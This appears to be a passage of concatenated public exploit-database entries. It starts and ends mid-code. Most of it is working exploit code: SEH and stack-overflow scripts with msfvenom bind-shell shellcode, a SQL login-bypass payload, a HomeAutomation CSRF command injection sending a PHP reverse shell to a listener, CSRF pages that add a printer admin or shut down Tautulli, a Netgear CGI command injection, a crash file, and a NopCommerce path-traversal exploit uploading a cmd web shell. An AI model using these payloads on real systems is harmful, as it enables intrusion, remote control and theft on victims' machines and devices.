b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43" shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b" shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c" shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36" shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35" shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b" shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56" shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a" shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50" shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d" shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33" shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31" shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f" shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38" shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59" shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50" shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51" shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50" shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42" shellcode += b"\x4c\x32\x43\x53\x30\x41\x41" jmp2nops = '\xe8\xff\xff\xff\xff' # call +4 // This call will land us at the last \xff of our call instruction jmp2nops += '\xc3' # ret/inc ebx // Since EIP is at \xff after call, this will be interpruted as: \xff\xc3 =inc ebx (a nop instruction) jmp2nops += '\x59' # pop ecx // Pop the memory location from the call instruction that was pushed onto the stack into the ECX register jmp2nops += '\x31\xd2' # xor edx, edx // Clear the EDX register. We are going to jump to the beginning of our buffer. jmp2nops += '\x66\x81\xca\xfc\x0f' # or dx, 4092 // EDX is now equal to 0x00000ffc jmp2nops += '\x66\x29\xd1' # sub ex, dx // We subtract 4092 bytes from our memory location in the ECX register. jmp2nops += '\xff\xe1' # jmp ecx // Now we jump back to the beginning of our buffer; into our NOP sled. offset = '\x41' * (4112-len(nops+shellcode+jmp2nops)) nSEH = '\xeb\xeb\x90\x90' # jmp short -22 (to jmp2nops) # 0x00457576 [ftpnavi.exe] : pop edx # pop ebx # ret # | Rebase: False | ASLR: False | SafeSEH: False # | (c:\FTP Navigator\ftpnavi.exe) | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} SEH = '\x76\x75\x45' # SEH 3 byte overwrite payload = nops+shellcode+offset+jmp2nops+nSEH+SEH File = 'poc.txt' f = open(File, 'w') # open file for write f.write(payload) f.close() # close the file print blt + File + " created successfully " except: print err + File + ' failed to create'

# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC) # Date: December 2019-12-28 # Exploit Author: boku # Original DoS: https://www.exploit-db.com/exploits/47788 # Original DoS Author: ZwX # Software Vendor: http://www.avs4you.com/ # Software Link: http://www.avs4you.com/avs-audio-converter.aspx # Version: 9.1.2.600 # Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363 # Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601 #!/usr/bin/python # Recreate: # 1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux. # 2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy. # 3) Install & Open AVS Audio Converter 9.1.2.600. # 4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window. # 5) Paste the copied payload from the 'bind9999.txt' file into the textbox. # 6) Click the 'Browse...' button; to the right of the textbox. # - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces. # Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet File = 'bind9999.txt' try: # 0x00400000 [AVSAudioConverter.exe] # 9.1.2.600 (C:\Program Files (x86)\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe) # - The only module that has SafeSEH disabled. # Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | # 0x00400000 | 0x00f33000 | False | False | False | False | False | # - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown. offEdx = '\x41'*260 edx = '\x42\x42\x42\x42' # EDX overwrite at 260 bytes. EDX=0x42424242 # SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed. nSEH = '\x42'*4 SEH = '\x43'*4 # - If address at offset 308 is not readable, then the program will throw an exception at: # 75F9ECE7 3806 cmp byte ptr ds:[esi], al # [!] Access violation when reading [esi] # - If we can get past this exception, we can overwrite EIP at offset 304. # - [esi] must be successfully overwriten so we can put our payload after it. offEip = '\x45'*32 # - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled. # - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump # to it with a vanilla EIP overwrite; due to overwriting a return address on the stack. # - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite: # ECX=0018FA60 ESP=0018FA60 (Stack locations will vary) # 0018FA54 45454545 EEEE // [296] # 0018FA58 45454545 EEEE // [300] # 0018FA5C 1006563E V... // [304] eip var # Pointer to 'pop+ret' # *0018FA60 00000000 .... // [308] esi var # our esi address gets replaced by 4 nulls # 0018FA64 1006A438 8... // [312] jmpEsp var # Pointer to 'jmp esp' # 0018FA68 E510EC10 .... // [316] fixStack var # ASM to fix the Stack so shellcode will work # [AVSAudioEditor5.dll] (C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSAudioEditor5.dll) # Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | # 0x10000000 | 0x100a1000 | False | True | False | False | False | # 0x1006563e : pop esi # ret | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll] eip = '\x3e\x56\x06\x10' # pop+ret # - After pop+ret, ESP=0018FA68 esi = '\x10\x10\x08\x10' # [AVSAudioEditor5.dll] | .data | RW # 0x1006a438 : jmp esp | {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll] # - the esi var address is just a random, readable memory location that will not move; to bypass the exception. jmpEsp = '\x38\xa4\x06\x10' # jmp esp pointer # EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly. fixStack = '\x83\xEC\x10' # sub esp, 0x10 fixStack += '\x89\xE5' # mov ebp, esp fixStack += '\x83\xEC\x60' # sub esp, 0x60 #msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00' --format python # x86/shikata_ga_nai succeeded with size 355 (iteration=0) shellcode = b"" shellcode += b"\xbe\xd8\x49\x8d\x72\xd9\xe5\xd9\x74\x24\xf4" shellcode += b"\x5a\x31\xc9\xb1\x53\x31\x72\x12\x83\xea\xfc" shellcode += b"\x03\xaa\x47\x6f\x87\xb6\xb0\xed\x68\x46\x41" shellcode += b"\x92\xe1\xa3\x70\x92\x96\xa0\x23\x22\xdc\xe4" shellcode += b"\xcf\xc9\xb0\x1c\x5b\xbf\x1c\x13\xec\x0a\x7b" shellcode += b"\x1a\xed\x27\xbf\x3d\x6d\x3a\xec\x9d\x4c\xf5" shellcode += b"\xe1\xdc\x89\xe8\x08\x8c\x42\x66\xbe\x20\xe6" shellcode += b"\x32\x03\xcb\xb4\xd3\x03\x28\x0c\xd5\x22\xff" shellcode += b"\x06\x8c\xe4\xfe\xcb\xa4\xac\x18\x0f\x80\x67" shellcode += b"\x93\xfb\x7e\x76\x75\x32\x7e\xd5\xb8\xfa\x8d" shellcode += b"\x27\xfd\x3d\x6e\x52\xf7\x3d\x13\x65\xcc\x3c" shellcode += b"\xcf\xe0\xd6\xe7\x84\x53\x32\x19\x48\x05\xb1" shellcode += b"\x15\x25\x41\x9d\x39\xb8\x86\x96\x46\x31\x29" shellcode += b"\x78\xcf\x01\x0e\x5c\x8b\xd2\x2f\xc5\x71\xb4" shellcode += b"\x50\x15\xda\x69\xf5\x5e\xf7\x7e\x84\x3d\x90" shellcode += b"\xb3\xa5\xbd\x60\xdc\xbe\xce\x52\x43\x15\x58" shellcode += b"\xdf\x0c\xb3\x9f\x20\x27\x03\x0f\xdf\xc8\x74" shellcode += b"\x06\x24\x9c\x24\x30\x8d\x9d\xae\xc0\x32\x48" shellcode += b"\x5a\xc8\x95\x23\x79\x35\x65\x94\x3d\x95\x0e" shellcode += b"\xfe\xb1\xca\x2f\x01\x18\x63\xc7\xfc\xa3\xac" shellcode += b"\x17\x88\x42\xd8\x37\xdc\xdd\x74\xfa\x3b\xd6" shellcode += b"\xe3\x05\x6e\x4e\x83\x4e\x78\x49\xac\x4e\xae" shellcode += b"\xfd\x3a\xc5\xbd\x39\x5b\xda\xeb\x69\x0c\x4d" shellcode += b"\x61\xf8\x7f\xef\x76\xd1\x17\x8c\xe5\xbe\xe7" shellcode += b"\xdb\x15\x69\xb0\x8c\xe8\x60\x54\x21\x52\xdb" shellcode += b"\x4a\xb8\x02\x24\xce\x67\xf7\xab\xcf\xea\x43" shellcode += b"\x88\xdf\x32\x4b\x94\x8b\xea\x1a\x42\x65\x4d" shellcode += b"\xf5\x24\xdf\x07\xaa\xee\xb7\xde\x80\x30\xc1" shellcode += b"\xde\xcc\xc6\x2d\x6e\xb9\x9e\x52\x5f\x2d\x17" shellcode += b"\x2b\xbd\xcd\xd8\xe6\x05\xfd\x92\xaa\x2c\x96" shellcode += b"\x7a\x3f\x6d\xfb\x7c\xea\xb2\x02\xff\x1e\x4b" shellcode += b"\xf1\x1f\x6b\x4e\xbd\xa7\x80\x22\xae\x4d\xa6" shellcode += b"\x91\xcf\x47" payload = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode # offsets: 0 260 264 268 272 304 308 312 316 324 f = open(File, 'w') # open file for write f.write(payload) f.close() # close the file print blt + File + " created successfully " # root@kali# nc <Victim IP> 9999 # Microsoft Windows [Version 6.1.7601] # C:\Program Files (x86)\AVS4YOU\AVSAudioConverter> except: print err + File + ' failed to create'

# Exploit Title: elearning-script 1.0 - Authentication Bypass # Author: riamloo # Date: 2019-12-29 # Vendor Homepage: https://github.com/amitkolloldey/elearning-script # Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip # Version: 1 # CVE: N/A # Tested on: Win 10 # Discription: # E Learning Blog Developed In Raw PHP # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : /login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/elearning-script-master/login.php POST /elearning-script-master/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; Content-Length: 445 Referer: http://localhost/elearning-script-master/login.php Cookie: PHPSESSID=a81sp8jg62nzxs8icvbf44ep3iu Connection: close Upgrade-Insecure-Requests: 1 '=''or'

# Exploit: HomeAutomation 3.3.2 - Remote Code Execution # Date: 2019-12-30 # Author: LiquidWorm # Vendor: Tom Rosenback and Daniel Malmgren # Product web page: http://karpero.mine.nu/ha/ # Affected version: 3.3.2 # Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips # Advisory ID: ZSL-2019-5560 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php HomeAutomation v3.3.2 CSRF Remote Command Execution (PHP Reverse Shell) PoC Vendor: Tom Rosenback and Daniel Malmgren Product web page: http://karpero.mine.nu/ha/ Affected version: 3.3.2 Summary: HomeAutomation is an open-source web interface and scheduling solution. It was initially made for use with the Telldus TellStick, but is now based on a plugin system and except for Tellstick it also comes with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, etc.) based on an advanced scheduling system, taking into account things like measurements from various sensors. With the houseplan view you can get a simple overview of the status of your devices at their location in your house. Desc: The application suffers from an authenticated OS command execution vulnerability using custom command v0.1 plugin. This can be exploited with CSRF vulnerability to execute arbitrary shell commands as the web user via the 'set_command_on' and 'set_command_off' POST parameters in '/system/systemplugins/customcommand/customcommand.plugin.php' by using an unsanitized PHP exec() function. =============================================================================== /system/systemplugins/customcommand/customcommand.plugin.php: ------------------------------------------------------------- 77: function toggleDevices($devicesToToggle, $statuses) { 78: $output = array(); 79: $command = ""; 80: 81: foreach($devicesToToggle as $device) 82: { 83: $status = $statuses[$device["id"]]; 84: if($status == 0) { 85: $command = $this->getSettings("command_off"); 86: } else { 87: $command = $this->getSettings("command_on"); 88: } 89: 90: if(!empty($command)) { 91: $command = replaceCustomStrings($command, $device, $statuses[$device["id"]]); 92: 93: exec($command, $output); 94: 95: SaveLog("Command: ".$command."\nOutput:\n".parseExecOutputToString($output)); 96: } 97: } 98: 99: return ""; 100: } =============================================================================== Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips Apache/2.4.29 (Ubuntu) PHP/7.4.0RC4 PHP/7.3.11 PHP 7.2.24-0ubuntu0.18.04.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5560 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php 06.11.2019 -- POST /homeautomation_v3_3_2/?page=conf-systemplugins HTTP/1.1 plugin=customcommand&action=savesettings&set_command_on=php+-r+%27%24sock%3Dfsockopen%28%22127.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&set_command_off=&savesettings=Save - lqwrm@metalgear:/$ nc -lvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from localhost 40724 received! /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ pwd /var/www/html/homeautomation_v3_3_2 $ exit lqwrm@metalgear:/$

# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin) # Date: 2018-12-17 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.xerox.com/ # Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series # Software : Xerox Printer # Product Version: AltaLink C8035 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware. # A request to add users is made in the Device User Database form field. This request is captured by # the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request # to add users is made in the Device User Database form field to the xerox.set URI. # (The frmUserName value must have a unique name.) # HTTP POST Request : POST /dummypost/xerox.set HTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 707 Origin: https://XXX.XXX.XXX.XXX Connection: close Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10 Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp Upgrade-Insecure-Requests: 1 NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10 # CSRF PoC HTML : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST"> <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;" /> <input type="hidden" name="isRoles" value="True" /> <input type="hidden" name="isPassword" value="True" /> <input type="hidden" name="isCreate" value="True" /> <input type="hidden" name="rolesStr" value="6&#44;1&#44;2" /> <input type="hidden" name="limited" value="0" /> <input type="hidden" name="oid" value="0" /> <input type="hidden" name="minLength" value="1" /> <input type="hidden" name="maxLength" value="63" /> <input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" /> <input type="hidden" name="isUserNameDisallowed" value="TRUE" /> <input type="hidden" name="isNumberRequired" value="" /> <input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" /> <input type="hidden" name="currentPage" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" /> <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;User&#95;Edit&#95;fn" /> <input type="hidden" name="frmFriendlyName" value="Ismail&#32;Tasdelen" /> <input type="hidden" name="frmUserName" value="ismailtasdelen" /> <input type="hidden" name="frmNewPassword" value="Test1234&#33;" /> <input type="hidden" name="frmRetypePassword" value="Test1234&#33;" /> <input type="hidden" name="frmOldPassword" value="undefined" /> <input type="hidden" name="SaveURL" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown) # Date: 2018-12-17 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://tautulli.com/ # Software : https://github.com/Tautulli/Tautulli # Product Version: v2.1.9 # Platform: Windows 10 (10.0.18362) # Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)] # Vulernability Type : Cross-Site Request Forgery (ShutDown) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has # been discovered that anonymous access can be achieved in applications that do # not have a user login area and that the remote media server can be shut down. # PoC Python Script : #!/usr/bin/env python # -*- coding: utf-8 -*- import requests icon = """ _____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___ |_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \ | || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ / |_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/ Unauthenticated Remote Code Execution by Ismail Tasdelen """ print(icon) host = input("[+] HOST: ") port = input("[+] PORT: ") response = requests.get("http://" + host + ":" + port + "/" + "shutdown" ) # You can also run the restart and update_check commands. if response.status_code == 200: print('[✓] Success!') elif response.status_code != 200: print('[✗] Unsuccessful!') else: exit() # HTTP GET Request : GET /shutdown HTTP/1.1 Host: XXX.XXX.XXX.XXX:8181 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://XXX.XXX.XXX.XXX:8181/home Upgrade-Insecure-Requests: 1 # CSRF PoC HTML : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://XXX.XXX.XXX.XXX:8181/shutdown"> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Netgear R6400 - Remote Code Execution # Date: 2019-12-14 # Exploit Author: Kevin Randall # CVE: CVE-2016-6277 # Vendor Homepage: https://www.netgear.com/ # Category: Hardware # Version: V1.0.7.2_1.1.93 # PoC #!/usr/bin/python import urllib2 IP_ADDR = "192.168.1.1" PROTOCOL = "http://" DIRECTORY = "/cgi-bin/;" CMD = "date" FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD req = urllib2.Request(url = FULL_URL) response = urllib2.urlopen(req) commandoutput = response.read() spl_word = "}" formattedoutput = commandoutput result = formattedoutput.rpartition(spl_word)[2] print result

# Exploit Title: XnView 2.49.1 - 'Research' Denial of Service (PoC) # Exploit Author : ZwX # Exploit Date: 2019-12-17 # Vendor Homepage : http://www.xnview.com # Link Software : https://www.xnview.com/fr/xnview/#downloads # Tested on OS: Windows 7 ''' Proof of Concept (PoC): ======================= 1.Download and install XnView 2.Open the XnView for Windows tools 3.Run the python operating script that will create a file (poc.txt) 4.Run the software " Tools -> Research -> A search window opens " 5.Copy and paste the characters in the file (poc.txt) 6.Paste the characters in the field 'File Name' and 'In' click on 'Research' 7.XnView for Windows Crashed ''' #!/usr/bin/python DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41") poc = DoS file = open("poc.txt,"w") file.write(poc) file.close() print "POC Created by ZwX"

# Vulnerability Title: NopCommerce 4.2.0 - Privilege Escalation # Author: Alessandro Magnosi (d3adc0de) # Date: 2019-07-07 # Vendor Homepage: https://www.nopcommerce.com/ # Software Link : https://www.nopcommerce.com/ # Tested Version: 4.2.0 # Vulnerability Type: Privilege Escalation # Tested on OS: Windows 10, CentOS, Docker # Exploit designed for: NopCommerce 4.2.0 on IIS import requests import argparse from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning import warnings warnings.filterwarnings("ignore", category=UserWarning, module='bs4') def proxy(flag): return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None def geturl(baseurl, type): if type == "login": return baseurl + "/login" elif type == "mv": return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2" elif type == "mkdir": return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common" elif type == "put": return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD" elif type == "contactus": return baseurl + "/contactus" else: return "" def login(email, password, url, proxy): res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False) cookie = res.cookies.get_dict() soup = BeautifulSoup(res.text, features="html.parser") token = soup.find("input", {"name":"__RequestVerificationToken"})["value"] res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False) cookies = res.cookies.get_dict() return { **cookies, **cookie } def shellupload(email, password, url, proxy): print("[+] Trying uploading shell from") cookies = login(email, password, url, proxy) # Rename Common Directory requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) # Create Common Directory requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) # Upload File into Common requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n<script\r\n src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n var cmdResult = $(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t console.log(\"should change text\");\r\n cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n if (results==null){\r\n return null;\r\n }\r\n else{\r\n return decodeURI(results[1]) || 0;\r\n }\r\n }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t var currentCmd = $.urlParam('cmd');\r\n\t console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t var currentUrl = location.href;\r\n\r\n\t var paramDelimeter = \"\";\r\n\t if (currentUrl.indexOf(\"?\") < 0){\r\n\t 